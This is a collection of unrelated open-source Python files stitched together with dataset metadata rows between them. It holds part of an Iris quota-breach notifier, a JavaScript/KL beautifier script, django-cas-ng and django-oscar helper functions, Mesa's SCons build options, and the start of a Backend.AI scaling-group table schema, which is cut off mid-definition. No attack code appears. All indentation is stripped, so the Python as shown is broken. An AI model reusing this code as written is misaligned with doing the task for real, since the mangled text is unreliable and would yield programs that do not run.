logger.warning('Application %s breached hard quota. Will create incident using plan %s', application, plan_name)
session = self.db.Session()
# Avoid creating new incident if we have an incident that's either not claimed or claimed and wait_time hasn't been exceeded
last_incident = self.last_incidents.get(application)
if last_incident:
last_incident_id, last_incident_created = last_incident
claimed = session.execute(check_incident_claimed_query, {'id': last_incident_id}).scalar()
if claimed:
logger.info('Skipping creating incident for application %s as existing incident %s is not claimed', application, last_incident_id)
session.close()
return
if wait_time and (time() - last_incident_created) < wait_time:
logger.info('Skipping creating incident for application %s as it is not yet %s seconds since existing incident %s was claimed',
application, wait_time, last_incident_id)
session.close()
return
# Make a new incident
incident_data = {
'plan_name': plan_name,
'created': datetime.utcnow(),
'sender_app_id': self.iris_application['id'],
'context': ujson.dumps({
'quota_breach': {
'application': application,
'limit': limit,
'duration': duration
}
})
}
incident_id = session.execute(create_incident_query, incident_data).lastrowid
session.commit()
session.close()
self.last_incidents[application] = incident_id, time()
logger.info('Created incident %s', incident_id)
def notify_target(self, application, limit, duration, target_name, target_role):
if not self.iris_application:
logger.warning('Application %s breached soft quota. Cannot notify owners as application is not set', application)
return
if not target_name or not target_role:
logger.error('Application %s breached soft quota. Cannot notify owner as they aren\'t set (may have been deleted).', application)
return
last_notification_time = self.last_soft_quota_notification_time.get(application)
now = time()
if last_notification_time is not None and (now - last_notification_time) < soft_quota_notification_interval:
logger.warning('Application %s breached soft quota. Will NOT notify %s:%s as they will only get a notification once every %s seconds.',
application, target_role, target_name, soft_quota_notification_interval)
return
self.last_soft_quota_notification_time[application] = now
logger.warning('Application %s breached soft quota. Will notify %s:%s', application, target_role, target_name)
targets = self.expand_targets(target_role, target_name)
if not targets:
logger.error('Failed resolving %s:%s to notify soft quota breach.', target_role, target_name)
return
mode_id = iris.cache.modes.get('email')
if not mode_id:
logger.error('Failed resolving email mode to notify soft quota breach for application %s', application)
return
for username in targets:
message = {
'application': self.iris_application['name'],
'mode_id': mode_id,
'mode': 'email',
'target': username,
'subject': 'Application %s exceeding message quota' % application,
'body': ('Hi %s\n\nYour application %s is currently exceeding its soft quota of %s messages per %s minutes.\n\n'
'If this continues, your messages will eventually be dropped on the floor and an Iris incident will be raised.\n\n'
'Regards,\nIris') % (username, application, limit, duration, )
}
self.message_send_enqueue(message)
| bsd-2-clause | 8,125,703,374,740,582,000 | 49.024823 | 155 | 0.567945 | false | 4.372908 | false | false | false |
ghostx2013/FabricEngine_Backup | Native/ThirdParty/Private/Python/js_beautifier.py | 4 | 22785 | import sys
import os
import exceptions
import glob
fileTypes = ['.js','.kl','.html']
controls = ['case', 'default', 'do', 'else','for', 'if','while','throw', 'switch', 'catch']
keywords = ['break', 'continue', 'finally', 'return',
'try', 'var', 'with', 'delete', 'new', 'typeof', 'instanceof', '#include']
functions = ['function', 'operator']
curly = ['{', '}']
brace = ['(', ')']
bracket = ['[', ']']
allbrackets = []
allbrackets.extend(curly)
allbrackets.extend(brace)
allbrackets.extend(bracket)
quotes = ['"', "'"]
whitespace = [' ', '\n']
comment = ['//', '/*', '*/']
semicolon = [';']
comma = [',','.']
unaoperators = ['++', '--', '>>', '<<']
binoperators = ['===', '!==', '<<=', '>>=', '+=', '-=', '/=', '*=', '%=',
'||', '&&', '>=', '<=', '==', '!=', '^=', '&=', '|=',
'+', '-', '/', '*', '%', '>', '<', ':', '?', '&', '^', '=', '!']
operators = []
operators.extend(unaoperators)
operators.extend(binoperators)
splitters = []
splitters.extend(comment)
splitters.extend(comma)
splitters.extend(semicolon)
splitters.extend(allbrackets)
splitters.extend(quotes)
splitters.extend(whitespace)
splitters.extend(operators)
TYPE_CONTROL = 0
TYPE_KEYWORD = 1
TYPE_FUNCTION = 2
TYPE_CURLY = 4
TYPE_BRACE = 8
TYPE_BRACKET = 16
TYPE_ALL_BRACKETS = TYPE_CURLY | TYPE_BRACE | TYPE_BRACKET
TYPE_QUOTE = 32
TYPE_WHITESPACE = 64
TYPE_COMMENT = 128
TYPE_NO_CODE = TYPE_WHITESPACE | TYPE_COMMENT
TYPE_SEMICOLON = 256
TYPE_COMMA = 512
TYPE_BINOPERATOR = 1024
TYPE_UNAOPERATOR = 2048
TYPE_OPERATOR = TYPE_BINOPERATOR | TYPE_UNAOPERATOR
TYPE_IDENTIFIER = 4096
class token():
string = ''
type = ''
index = -1
def __init__(self,string,type = TYPE_IDENTIFIER,index = 0):
self.string = string
self.type = type
self.index = index
def isTypeOf(self,type):
return self.type
def tokenize(content):
# first some basic formatting
content = content.replace('\t',' ')
# get all of the words
words = []
while len(content) > 0:
minSplitIndex = len(content)
minSplitter = ''
for i in range(len(splitters)):
split = content.partition(splitters[i])
if len(split[1]) > 0:
if len(split[0]) < minSplitIndex:
minSplitIndex = len(split[0])
minSplitter = splitters[i]
if minSplitIndex == len(content):
words.append(content)
content = ''
else:
split = content.partition(minSplitter)
if len(split[0]) > 0:
words.append(split[0])
words.append(split[1])
content = split[2]
# parse the words to tokens
tokens = []
for word in words:
tokenIdentified = False
if not tokenIdentified:
for i in range(len(controls)):
if(word == controls[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_CONTROL,i))
break
if not tokenIdentified:
for i in range(len(keywords)):
if(word == keywords[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_KEYWORD,i))
break
if not tokenIdentified:
for i in range(len(functions)):
if(word == functions[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_FUNCTION,i))
break
if not tokenIdentified:
for i in range(len(curly)):
if(word == curly[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_CURLY,i))
break
if not tokenIdentified:
for i in range(len(brace)):
if(word == brace[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_BRACE,i))
break
if not tokenIdentified:
for i in range(len(bracket)):
if(word == bracket[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_BRACKET,i))
break
if not tokenIdentified:
for i in range(len(quotes)):
if(word == quotes[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_QUOTE,i))
break
if not tokenIdentified:
for i in range(len(whitespace)):
if(word == whitespace[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_WHITESPACE,i))
break
if not tokenIdentified:
for i in range(len(comment)):
if(word == comment[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_COMMENT,i))
break
if not tokenIdentified:
for i in range(len(semicolon)):
if(word == semicolon[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_SEMICOLON,i))
break
if not tokenIdentified:
for i in range(len(comma)):
if(word == comma[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_COMMA,i))
break
if not tokenIdentified:
for i in range(len(binoperators)):
if(word == binoperators[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_BINOPERATOR,i))
break
if not tokenIdentified:
for i in range(len(unaoperators)):
if(word == unaoperators[i]):
tokenIdentified = True
tokens.append(token(word,TYPE_UNAOPERATOR,i))
break
if not tokenIdentified:
tokenIdentified = True
tokens.append(token(word,TYPE_IDENTIFIER,0))
# now since we know the tokens, let's simply some of them
# simplify the comment tokens into single tokens
newTokens = []
lastToken = False
for i in range(len(tokens)):
if(lastToken):
if(lastToken.index == 0):
if(tokens[i].type == TYPE_WHITESPACE and tokens[i].index == 1):
newTokens.append(lastToken)
newTokens.append(tokens[i])
lastToken = False
else:
lastToken.string += tokens[i].string;
elif(lastToken.index == 1):
lastToken.string += tokens[i].string;
if(tokens[i].type == TYPE_COMMENT and tokens[i].index == 2):
newTokens.append(lastToken)
lastToken = False
elif(tokens[i].type == TYPE_COMMENT):
lastToken = tokens[i]
else:
newTokens.append(tokens[i])
if(lastToken):
newTokens.append(lastToken)
tokens = newTokens
# simplify the string tokens into single tokens
newTokens = []
lastToken = False
for i in range(len(tokens)):
if(lastToken):
if(tokens[i].type == TYPE_QUOTE):
if(tokens[i].index == lastToken.index):
lastToken.string += "'"
newTokens.append(lastToken)
lastToken = False
else:
lastToken.string += '"'
else:
lastToken.string += tokens[i].string
elif(tokens[i].type == TYPE_QUOTE):
lastToken = tokens[i]
lastToken.string = "'" # prefer singles
else:
newTokens.append(tokens[i])
if(lastToken):
newTokens.append(lastToken)
tokens = newTokens
# simplify the numeric tokens into single tokens
newTokens = []
lastToken = False
for i in range(len(tokens)-1):
if(lastToken):
if(tokens[i].type == TYPE_IDENTIFIER):
if(tokens[i].string == 'e' and lastToken.string.find('e') == -1):
lastToken.string += tokens[i].string;
else:
try:
intvalue = int(tokens[i].string[0:1])
lastToken.string += tokens[i].string;
except Exception:
newTokens.append(lastToken)
newTokens.append(tokens[i])
lastToken = False
elif(tokens[i].type == TYPE_COMMA and tokens[i].index == 1 and lastToken.string.endswith('e')):
lastToken.string += tokens[i].string;
elif(tokens[i].type == TYPE_BINOPERATOR and tokens[i].string == '-' and tokens[i+1].type == TYPE_IDENTIFIER):
try:
intvalue = int(tokens[i+1].string[0:1])
lastToken.string += tokens[i].string;
except Exception:
newTokens.append(lastToken)
newTokens.append(tokens[i])
lastToken = False
else:
newTokens.append(lastToken)
newTokens.append(tokens[i])
lastToken = False
elif(tokens[i].type == TYPE_IDENTIFIER):
try:
intvalue = int(tokens[i].string[0:1])
lastToken = tokens[i]
except Exception:
newTokens.append(tokens[i])
else:
newTokens.append(tokens[i])
if(lastToken):
newTokens.append(lastToken)
newTokens.append(tokens[len(tokens)-1])
tokens = newTokens
# simplify the regex tokens into single tokens
newTokens = []
startIndex = -1
endIndex = -1
string = ''
i = 0
while(i < len(tokens)):
if(startIndex > -1):
tkn = tokens[i];
if(not string.endswith("\\") and (
(tkn.type == TYPE_SEMICOLON) or
(tkn.type == TYPE_BRACE and tkn.index == 1) or
(tkn.type == TYPE_WHITESPACE and tkn == 0)
)):
if(endIndex > -1):
string = ''
for j in range(startIndex,endIndex+1):
string += tokens[j].string
newTokens.append(token(string))
i = endIndex
else:
i = startIndex
newTokens.append(tokens[i])
startIndex = -1
endIndex = -1
string = ''
elif(tkn.type == TYPE_BINOPERATOR and tkn.string == '/'):
endIndex = i
string += tkn.string
else:
string += tkn.string
elif(i > 0 and tokens[i].type == TYPE_BINOPERATOR and tokens[i].string == '/'):
# check if the previous is not an identifier, not an operator
j = i-1
prev = tokens[j]
while(prev.type == TYPE_WHITESPACE and j > 0):
j -= 1
prev = tokens[j]
if((prev.type == TYPE_BINOPERATOR and prev.string == '=') or
(prev.type == TYPE_BRACE and prev.index == 0) or
(prev.type == TYPE_COMMA and prev_index == 0)):
startIndex = i
string = tokens[i].string
else:
newTokens.append(tokens[i])
else:
newTokens.append(tokens[i])
i+=1
tokens = newTokens
# now let's simplify the whitespace tokens into single ones
newTokens = []
lastToken = False
for i in range(len(tokens)):
if(lastToken):
if(lastToken.index == 0):
if(tokens[i].type == TYPE_WHITESPACE):
if(tokens[i].index == 1):
lastToken = tokens[i]
else:
newTokens.append(tokens[i])
lastToken = False
elif(lastToken.index == 1):
if(tokens[i].type == TYPE_WHITESPACE):
if(tokens[i].index == 1):
if(len(lastToken.string) < 2):
lastToken.string += tokens[i].string
else:
newTokens.append(lastToken)
newTokens.append(tokens[i])
lastToken = False
elif(tokens[i].type == TYPE_WHITESPACE):
lastToken = tokens[i]
else:
newTokens.append(tokens[i])
if(lastToken):
newTokens.append(lastToken)
tokens = newTokens
# now let's switch curly and newline tokens
for i in range(len(tokens)-1):
if(tokens[i].type == TYPE_WHITESPACE):
if(tokens[i+1].type == TYPE_CURLY and tokens[i+1].index == 0):
if(i < len(tokens)-2):
if(tokens[i+2].type == TYPE_WHITESPACE):
tokens.remove(tokens[i+2])
if(i == 0 or tokens[i-1].type != TYPE_COMMENT):
tmp = tokens[i]
tokens[i] = tokens[i+1]
tokens[i+1] = tmp
elif(tokens[i].type == TYPE_CURLY and tokens[i].index == 0):
if(tokens[i+1].type != TYPE_WHITESPACE and not(tokens[i+1].type == TYPE_CURLY and tokens[i+1].index == 1)):
tokens.insert(i+1,token('\n',TYPE_WHITESPACE,1))
elif(tokens[i+1].type == TYPE_CURLY and tokens[i+1].index == 1):
if(tokens[i].type != TYPE_WHITESPACE and not(tokens[i].type == TYPE_CURLY and tokens[i+1].index == 0)):
tokens.insert(i+1,token('\n',TYPE_WHITESPACE,1))
if(i == len(tokens)-2):
break
# now let's switch curly and newline tokens
curlyCount = 0
braceCount = 0
for i in range(len(tokens)-1):
if(tokens[i].type == TYPE_CURLY):
if(tokens[i].index == 0):
curlyCount += 1
else:
curlyCount -= 1
elif(tokens[i].type == TYPE_BRACE):
if(tokens[i].index == 0):
braceCount += 1
else:
braceCount -= 1
#elif(tokens[i].type == TYPE_COMMA and tokens[i].index == 0):
# if(braceCount <= curlyCount):
# tokens.insert(i+1,token('\n',TYPE_WHITESPACE,1))
return tokens
def stringify(tokens, extension = 'js'):
lines = []
line = []
# loop over all tokens and put them in lines
for i in range(len(tokens)):
if(tokens[i].type == TYPE_WHITESPACE):
if(tokens[i].index == 1):
lines.append(line)
if(len(tokens[i].string) > 1):
lines.append([token('',TYPE_WHITESPACE)])
line = []
continue
line.append(tokens[i])
if(len(line)>0):
lines.append(line)
strings = []
tabs = ''
globalCurlyCount = 0
globalBraceCount = 0
globalBracketCount = 0
globalQuoteCount = 0
entryQuote = 0
history = []
for j in range(len(lines)):
line = lines[j]
curlyCount = 0
braceCount = 0
bracketCount = 0
string = ''
# check if we have a single control line without curly
prevLine = False
if(j > 0):
k = j-1
while(k >= 0):
if(len(lines[k]) > 0 and (len(lines[k]) > 1 or lines[k][0].type != TYPE_WHITESPACE)):
prevLine = lines[k]
break
k -= 1
for i in range(len(line)):
if(line[i].type == TYPE_CURLY):
if(line[i].index == 0):
globalCurlyCount += 1
curlyCount += 1
else:
if(curlyCount == 0):
string = string[2:100000]
globalCurlyCount -= 1
curlyCount -= 1
if(line[i].type == TYPE_BRACE):
if(line[i].index == 0):
globalBraceCount += 1
braceCount += 1
else:
if(braceCount == 0):
string = string[2:100000]
globalBraceCount -= 1
braceCount -= 1
if(line[i].type == TYPE_BRACKET):
if(line[i].index == 0):
globalBracketCount += 1
bracketCount += 1
else:
if(bracketCount == 0):
string = string[2:100000]
globalBracketCount -= 1
bracketCount -= 1
tabCount = curlyCount + braceCount + bracketCount
tabBefore = True
if(prevLine):
if(prevLine[0].type == TYPE_CONTROL and prevLine[0].string != 'case' and prevLine[0].string != 'default'):
lastToken = prevLine[len(prevLine)-1]
if(lastToken.type != TYPE_CURLY or lastToken.index > 0):
string += ' ';
elif(prevLine[len(prevLine)-1].type == TYPE_BINOPERATOR and tabCount <= 0):
tabBefore = False
string += ' ';
if(tabCount < 0 and tabBefore):
for i in range(abs(tabCount)):
tabs = tabs[2:10000]
string += tabs
if(len(line)>1):
firstToken = line[0]
lastToken = line[len(line)-1]
if(firstToken.index == 1 and (firstToken.type == TYPE_CURLY or firstToken.type == TYPE_BRACE or firstToken.type == TYPE_BRACKET) and
lastToken.index == 0 and (lastToken.type == TYPE_CURLY or lastToken.type == TYPE_BRACE or lastToken.type == TYPE_BRACKET)):
string = string[2:10000]
elif(len(line) == 1 and line[0].type == TYPE_CURLY and line[0].index == 0):
string = string[2:10000]
if(tabCount < 0 and not tabBefore):
for i in range(abs(tabCount)):
tabs = tabs[2:10000]
if(tabCount > 0):
for i in range(tabCount):
tabs += ' '
for i in range(0,len(line)):
if(line[i].type == TYPE_BRACE or line[i].type == TYPE_CURLY or line[i].type == TYPE_BRACKET):
if(line[i].index == 0):
history.append(line[i].string)
else:
if(line[i].type == TYPE_CURLY):
if(len(history) > 2 and history[len(history)-1] == 'case'):
tabs = tabs[2:10000]
string = string[2:10000]
history.pop()
if(len(history) > 0):
history.pop()
if(line[i].type == TYPE_COMMENT):
string += line[i].string.strip()
continue
if(line[i].type == TYPE_CURLY):
if(line[i].index == 0 and not string.endswith(' ') and not string.endswith('[') and not string.endswith('(')):
string += ' '+line[i].string
continue
if(line[i].type == TYPE_FUNCTION):
if(line[i+1].type != TYPE_BRACE and (line[i].string == 'function' or extension == 'kl')):
string += line[i].string+' '
continue
if(line[i].type == TYPE_BINOPERATOR):
if(line[i].string == '-'):
if(i==0):
string += line[i].string
continue
if(line[i-1].type != TYPE_IDENTIFIER and line[i-1].index == 0):
string += line[i].string
continue
if(not string.endswith(' ')):
if line[i].string == ":" :
if(len(history) > 0):
if(history[len(history)-1] == '?'):
string += ' '
history.pop()
elif line[i].string == "?":
history.append('?')
string += ' '
elif line[i].string == "!":
if(not string.endswith('(')):
string += ' '
else:
string += ' '
string += line[i].string
if(i < len(line)-1 and line[i].string != '!'):
string += ' '
continue
if(line[i].type == TYPE_COMMA and line[i].index == 0 and i < len(line)-1):
string += line[i].string+' '
continue
if(line[i].type == TYPE_CONTROL):
if(line[i].string == 'case' or line[i].string == 'default'):
if(len(history)>0 and history[len(history)-1] == 'case'):
string = string[2:10000]
else:
history.append('case')
tabs += ' '
if(i < len(line)-1 and (line[i+1].type == TYPE_BRACE or line[i+1].type == TYPE_CONTROL or line[i+1].type == TYPE_COMMENT or line[i+1].type == TYPE_IDENTIFIER)):
string += line[i].string+' '
else:
string += line[i].string
continue
if(line[i].type == TYPE_KEYWORD and (line[i].string == "var" or line[i].string == "#include")):
string += line[i].string+' '
continue
if(line[i].type == TYPE_KEYWORD and line[i].string == "return" and i < len(line)-1 and line[i+1].type != TYPE_SEMICOLON):
string += line[i].string+' '
continue
if(line[i].type == TYPE_IDENTIFIER and len(string) > 0 and not string.endswith(' ') and not string.endswith('.') and not string.endswith('(') and not string.endswith('[') and not string.endswith('{') and not string.endswith('!')):
if(string.endswith('-') and not string[0:len(string)-1].endswith(' ')):
string += line[i].string
else:
string += ' '+line[i].string
continue
if(line[i].type == TYPE_SEMICOLON and i < len(line)-1 and line[i+1].type != TYPE_WHITESPACE):
string += line[i].string + ' '
continue
string += line[i].string
if(len(string.strip())==0):
strings.append('')
else:
strings.append(string)
# now reindent the tabs, based on smallest indent possible
counts = []
for string in strings:
count = 0
while(string[count*2:count*2+1] == ' '):
count += 1
counts.append(count)
def reindent(strings,counts,index):
if(strings[index] == ''):
return
count = counts[index]
while(counts[index+1] == count or strings[index+1] == ''):
index += 1
if(index == len(counts)-1):
return
if(counts[index+1] > count+1):
highIndex = index+1
lowIndex = index+1
# we found a 2 tabbing or higher
# now let's check if the next lower one is also my count
while(counts[lowIndex] >= counts[highIndex] or strings[lowIndex] == ''):
lowIndex += 1
if(lowIndex == len(counts)-1):
break
if(counts[lowIndex] <= count):
# fantastic, we can lower the tabs
diff = count - counts[highIndex] + 1
for i in range(highIndex,lowIndex):
counts[i] += diff
for i in range(len(counts)-1):
reindent(strings,counts,i)
for i in range(len(counts)):
count = 0
while(strings[i][count:count+1] == ' '):
count += 1
newCount = counts[i] * 2
strings[i] = strings[i][(count-newCount):100000]
return '\n'.join(strings)
def parseJSFile(fileName):
# get the content
content = open(fileName).read()
tokens = tokenize(content)
string = stringify(tokens)
if(not string.endswith('\n')):
string += '\n'
open(fileName,'w').write(string)
def parseHTMLFile(fileName):
# get the content
lines = open(fileName).read().replace('\t',' ').replace('\r\n','\n').replace('\r','\n').split('\n')
prejscontent = []
jscontent = []
postjscontent = []
insideJS = 0
for line in lines:
stripped = line.lower().strip()
if(insideJS == 0):
if(stripped.startswith('<')):
stripped = stripped[1:10000].strip()
if(stripped.startswith('script') and stripped.find('src')==-1):
insideJS = 1
prejscontent.append(line)
elif(insideJS == 1):
if(stripped.startswith('<')):
insideJS = 2
postjscontent.append(line)
else:
jscontent.append(line)
else:
postjscontent.append(line)
tokens = tokenize('\n'.join(jscontent))
string = stringify(tokens)
string = '\n'.join(prejscontent) + '\n' + string + '\n' + '\n'.join(postjscontent)
open(fileName,'w').write(string)
def main():
if(not sys.argv or len(sys.argv) == 0):
raise(Exception("No files specified!"))
arguments = []
for arg in sys.argv:
arguments.append(arg)
if(len(arguments) <= 1):
print("Run the tool with all paths to beautify!")
return
files = []
for arg in arguments:
if(arg.find('*') != -1):
matched = glob.glob(arg)
for match in matched:
arguments.append(match)
continue
for ft in fileTypes:
if(arg.lower().endswith(ft)):
if(os.path.exists(arg)):
files.append(arg)
break
else:
raise(Exception("The file '"+arg+' does not exist!'))
# parse each file
for i in range(len(files)):
extension = files[i].lower().rpartition('.')[2]
if(extension == 'js' or extension == 'kl'):
parseJSFile(files[i])
elif(extension == 'html' or extension == 'htm'):
parseHTMLFile(files[i])
else:
raise(Exception("Unsupported file format '"+extension+"'!"))
print(str(i+1)+" of "+str(len(files))+" : beautified '"+files[i]+"' successfully.")
if __name__ == '__main__':
main() | agpl-3.0 | 8,105,533,336,471,990,000 | 30.691238 | 236 | 0.560588 | false | 3.587624 | false | false | false |
IRI-Research/django-cas-ng | django_cas_ng/utils.py | 2 | 1949 | from .cas import CASClient
from django.conf import settings as django_settings
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.utils.six.moves import urllib_parse
def get_protocol(request):
"""Returns 'http' or 'https' for the request protocol"""
if request.is_secure():
return 'https'
return 'http'
def get_redirect_url(request):
"""Redirects to referring page, or CAS_REDIRECT_URL if no referrer is
set.
"""
next_ = request.GET.get(REDIRECT_FIELD_NAME)
if not next_:
if django_settings.CAS_IGNORE_REFERER:
next_ = django_settings.CAS_REDIRECT_URL
else:
next_ = request.META.get('HTTP_REFERER', django_settings.CAS_REDIRECT_URL)
prefix = urllib_parse.urlunparse(
(get_protocol(request), request.get_host(), '', '', '', ''),
)
if next_.startswith(prefix):
next_ = next_[len(prefix):]
return next_
def get_service_url(request, redirect_to=None):
"""Generates application django service URL for CAS"""
protocol = get_protocol(request)
host = request.get_host()
service = urllib_parse.urlunparse(
(protocol, host, request.path, '', '', ''),
)
if '?' in service:
service += '&'
else:
service += '?'
service += urllib_parse.urlencode({
REDIRECT_FIELD_NAME: redirect_to or get_redirect_url(request)
})
return service
def get_cas_client(service_url=None):
"""
initializes the CASClient according to
the CAS_* settigs
"""
return CASClient(
service_url=service_url,
version=django_settings.CAS_VERSION,
server_url=django_settings.CAS_SERVER_URL,
extra_login_params=django_settings.CAS_EXTRA_LOGIN_PARAMS,
renew=django_settings.CAS_RENEW,
username_attribute=django_settings.CAS_USERNAME_ATTRIBUTE,
proxy_callback=django_settings.CAS_PROXY_CALLBACK
)
| mit | -8,768,147,920,393,516,000 | 29.936508 | 86 | 0.638789 | false | 3.821569 | false | false | false |
WillisXChen/django-oscar | src/oscar/apps/customer/utils.py | 18 | 4652 | import logging
from django.conf import settings
from django.contrib.auth.tokens import default_token_generator
from django.core.mail import EmailMessage, EmailMultiAlternatives
from django.core.urlresolvers import reverse
from django.utils.encoding import force_bytes
from django.utils.http import urlsafe_base64_encode
from oscar.core.loading import get_model
CommunicationEvent = get_model('order', 'CommunicationEvent')
Email = get_model('customer', 'Email')
class Dispatcher(object):
def __init__(self, logger=None):
if not logger:
logger = logging.getLogger(__name__)
self.logger = logger
# Public API methods
def dispatch_direct_messages(self, recipient, messages):
"""
Dispatch one-off messages to explicitly specified recipient(s).
"""
if messages['subject'] and messages['body']:
self.send_email_messages(recipient, messages)
def dispatch_order_messages(self, order, messages, event_type=None,
**kwargs):
"""
Dispatch order-related messages to the customer
"""
if order.is_anonymous:
if 'email_address' in kwargs:
self.send_email_messages(kwargs['email_address'], messages)
elif order.guest_email:
self.send_email_messages(order.guest_email, messages)
else:
return
else:
self.dispatch_user_messages(order.user, messages)
# Create order communications event for audit
if event_type is not None:
CommunicationEvent._default_manager.create(
order=order, event_type=event_type)
def dispatch_user_messages(self, user, messages):
"""
Send messages to a site user
"""
if messages['subject'] and (messages['body'] or messages['html']):
self.send_user_email_messages(user, messages)
if messages['sms']:
self.send_text_message(user, messages['sms'])
# Internal
def send_user_email_messages(self, user, messages):
"""
Sends message to the registered user / customer and collects data in
database
"""
if not user.email:
self.logger.warning("Unable to send email messages as user #%d has"
" no email address", user.id)
return
email = self.send_email_messages(user.email, messages)
# Is user is signed in, record the event for audit
if email and user.is_authenticated():
Email._default_manager.create(user=user,
subject=email.subject,
body_text=email.body,
body_html=messages['html'])
def send_email_messages(self, recipient, messages):
"""
Plain email sending to the specified recipient
"""
if hasattr(settings, 'OSCAR_FROM_EMAIL'):
from_email = settings.OSCAR_FROM_EMAIL
else:
from_email = None
# Determine whether we are sending a HTML version too
if messages['html']:
email = EmailMultiAlternatives(messages['subject'],
messages['body'],
from_email=from_email,
to=[recipient])
email.attach_alternative(messages['html'], "text/html")
else:
email = EmailMessage(messages['subject'],
messages['body'],
from_email=from_email,
to=[recipient])
self.logger.info("Sending email to %s" % recipient)
email.send()
return email
def send_text_message(self, user, event_type):
raise NotImplementedError
def get_password_reset_url(user, token_generator=default_token_generator):
"""
Generate a password-reset URL for a given user
"""
kwargs = {
'token': token_generator.make_token(user),
'uidb64': urlsafe_base64_encode(force_bytes(user.id)),
}
return reverse('password-reset-confirm', kwargs=kwargs)
def normalise_email(email):
"""
The local part of an email address is case-sensitive, the domain part
isn't. This function lowercases the host and should be used in all email
handling.
"""
clean_email = email.strip()
if '@' in clean_email:
local, host = clean_email.split('@')
return local + '@' + host.lower()
return clean_email
| bsd-3-clause | -8,306,801,830,486,856,000 | 34.242424 | 79 | 0.577386 | false | 4.642715 | false | false | false |
s20121035/rk3288_android5.1_repo | external/mesa3d/common.py | 12 | 3337 | #######################################################################
# Common SCons code
import os
import os.path
import re
import subprocess
import sys
import platform as _platform
import SCons.Script.SConscript
#######################################################################
# Defaults
host_platform = _platform.system().lower()
if host_platform.startswith('cygwin'):
host_platform = 'cygwin'
# Search sys.argv[] for a "platform=foo" argument since we don't have
# an 'env' variable at this point.
if 'platform' in SCons.Script.ARGUMENTS:
target_platform = SCons.Script.ARGUMENTS['platform']
else:
target_platform = host_platform
_machine_map = {
'x86': 'x86',
'i386': 'x86',
'i486': 'x86',
'i586': 'x86',
'i686': 'x86',
'BePC': 'x86',
'Intel': 'x86',
'ppc' : 'ppc',
'BeBox': 'ppc',
'BeMac': 'ppc',
'AMD64': 'x86_64',
'x86_64': 'x86_64',
'sparc': 'sparc',
'sun4u': 'sparc',
}
# find host_machine value
if 'PROCESSOR_ARCHITECTURE' in os.environ:
host_machine = os.environ['PROCESSOR_ARCHITECTURE']
else:
host_machine = _platform.machine()
host_machine = _machine_map.get(host_machine, 'generic')
default_machine = host_machine
default_toolchain = 'default'
if target_platform == 'windows' and host_platform != 'windows':
default_machine = 'x86'
default_toolchain = 'crossmingw'
# find default_llvm value
if 'LLVM' in os.environ:
default_llvm = 'yes'
else:
default_llvm = 'no'
try:
if target_platform != 'windows' and \
subprocess.call(['llvm-config', '--version'], stdout=subprocess.PIPE) == 0:
default_llvm = 'yes'
except:
pass
#######################################################################
# Common options
def AddOptions(opts):
try:
from SCons.Variables.BoolVariable import BoolVariable as BoolOption
except ImportError:
from SCons.Options.BoolOption import BoolOption
try:
from SCons.Variables.EnumVariable import EnumVariable as EnumOption
except ImportError:
from SCons.Options.EnumOption import EnumOption
opts.Add(EnumOption('build', 'build type', 'debug',
allowed_values=('debug', 'checked', 'profile', 'release')))
opts.Add(BoolOption('verbose', 'verbose output', 'no'))
opts.Add(EnumOption('machine', 'use machine-specific assembly code', default_machine,
allowed_values=('generic', 'ppc', 'x86', 'x86_64')))
opts.Add(EnumOption('platform', 'target platform', host_platform,
allowed_values=('cygwin', 'darwin', 'freebsd', 'haiku', 'linux', 'sunos', 'windows')))
opts.Add(BoolOption('embedded', 'embedded build', 'no'))
opts.Add('toolchain', 'compiler toolchain', default_toolchain)
opts.Add(BoolOption('gles', 'EXPERIMENTAL: enable OpenGL ES support', 'no'))
opts.Add(BoolOption('llvm', 'use LLVM', default_llvm))
opts.Add(BoolOption('openmp', 'EXPERIMENTAL: compile with openmp (swrast)', 'no'))
opts.Add(BoolOption('debug', 'DEPRECATED: debug build', 'yes'))
opts.Add(BoolOption('profile', 'DEPRECATED: profile build', 'no'))
opts.Add(BoolOption('quiet', 'DEPRECATED: profile build', 'yes'))
opts.Add(BoolOption('texture_float', 'enable floating-point textures and renderbuffers', 'no'))
if host_platform == 'windows':
opts.Add(EnumOption('MSVS_VERSION', 'MS Visual C++ version', None, allowed_values=('7.1', '8.0', '9.0')))
| gpl-3.0 | -422,272,697,593,503,300 | 31.398058 | 107 | 0.635301 | false | 3.363911 | false | false | false |
lablup/backend.ai-manager | src/ai/backend/manager/models/scaling_group.py | 1 | 18805 | from __future__ import annotations
from typing import (
Any,
Dict,
Sequence,
Set,
TYPE_CHECKING,
Union,
)
import uuid
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql as pgsql
from sqlalchemy.engine.row import Row
from sqlalchemy.ext.asyncio import AsyncConnection as SAConnection
import graphene
from graphene.types.datetime import DateTime as GQLDateTime
from .base import (
metadata,
simple_db_mutate,
simple_db_mutate_returning_item,
set_if_set,
batch_result,
)
from .group import resolve_group_name_or_id
from .user import UserRole
if TYPE_CHECKING:
from .gql import GraphQueryContext
__all__: Sequence[str] = (
# table defs
'scaling_groups',
'sgroups_for_domains',
'sgroups_for_groups',
'sgroups_for_keypairs',
# functions
'query_allowed_sgroups',
'ScalingGroup',
'CreateScalingGroup',
'ModifyScalingGroup',
'DeleteScalingGroup',
'AssociateScalingGroupWithDomain',
'AssociateScalingGroupWithUserGroup',
'AssociateScalingGroupWithKeyPair',
'DisassociateScalingGroupWithDomain',
'DisassociateScalingGroupWithUserGroup',
'DisassociateScalingGroupWithKeyPair',
)
scaling_groups = sa.Table(
'scaling_groups', metadata,
sa.Column('name', sa.String(length=64), primary_key=True),
sa.Column('description', sa.String(length=512)),
sa.Column('is_active', sa.Boolean, index=True, default=True),
sa.Column('created_at', sa.DateTime(timezone=True),
server_default=sa.func.now()),
sa.Column('driver', sa.String(length=64), nullable=False),
sa.Column('driver_opts', pgsql.JSONB(), nullable=False, default={}),
